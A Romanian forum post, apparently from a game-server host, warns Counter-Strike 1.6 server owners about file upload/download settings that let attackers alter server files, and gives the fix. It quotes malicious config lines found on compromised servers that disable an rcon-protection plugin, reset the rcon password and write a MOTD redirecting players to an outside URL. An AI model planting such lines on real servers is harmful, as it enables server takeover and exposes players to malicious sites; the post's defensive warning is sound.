Exploit periculos CS 1.6

[Pokeit]

Acum câteva luni de zile am descoperit un exploit in Counter Strike.

Dacă aveați in server.cfg:

sv_allowdownload 1

sv_allowupload 1putea să acceseze și să modifice orice fișier din serverul vostru de counter strike.

Problema se rezolva relativ foarte simplu, trebuia să puneți in loc de unu, zero, adică așa:

sv_allowdownload 0

sv_allowupload 0Cei care profitau de acest exploit in general schimbau motd-ul, iși dădeau admine, furau parola rcon, etc.. sau forța utilizatorul să downloadeze un virus.

Recent văzând ca cei care au fost vulnerabili făceau aceste modificări s-au gândit la o metodă mai ingenioasă de a avea acces chiar dacă voi făceați aceste modificări dându-vă impresia că nu asta e rezolvarea, profitau de faptul că avea acces la tot serverul și vi-l modificau, adică audăugau configuri noi in server.cfg gen exec numeconfig care fiind după parola inițiala de rcon o rescria.

Un client ne-a spus că i-au pus si pluginuri care făceau aceste modificări in server automat la fiecare restart, fisiere config de genul de_dust2.cfg / de_nuke.cfg / menu.cfg create in directorul configs localizat in addons/amxmodx/configs/maps/

amxx pause rcon_defencer.amxx

rcon_password 56425642

motdfile motd.txt

motd_write <META HTTP-EQUIV=Refresh CONTENT=0 URL=http://swat-zone.com...9-RCON-Defencer

Mare atenție să aveți zero in loc de unu in server.cfg la sv_allowdownload si sv_allowupload, pe cât este de simplă soluția pe atât este de periculoasă problema, dacă are acces la serverul vostru poate crea foarte multe fișiere in foarte multe locații care sunt executate fara ca voi să știți unde se află, o dată ce reușește acest lucru e greu să vă curățați serverul.

 

Aceste setări nu afectează downloadurl-ul !

Dacă observați că aveți probleme și fisierele serverului v-au fost compromise, vă rog să ne contactați pentru a ne cere un backup-ul cu fisierele serverului curate

[Pokeit]

Ma scuzati pentru acele linkuri. Numai stiu exact daca exista sau nu acel ip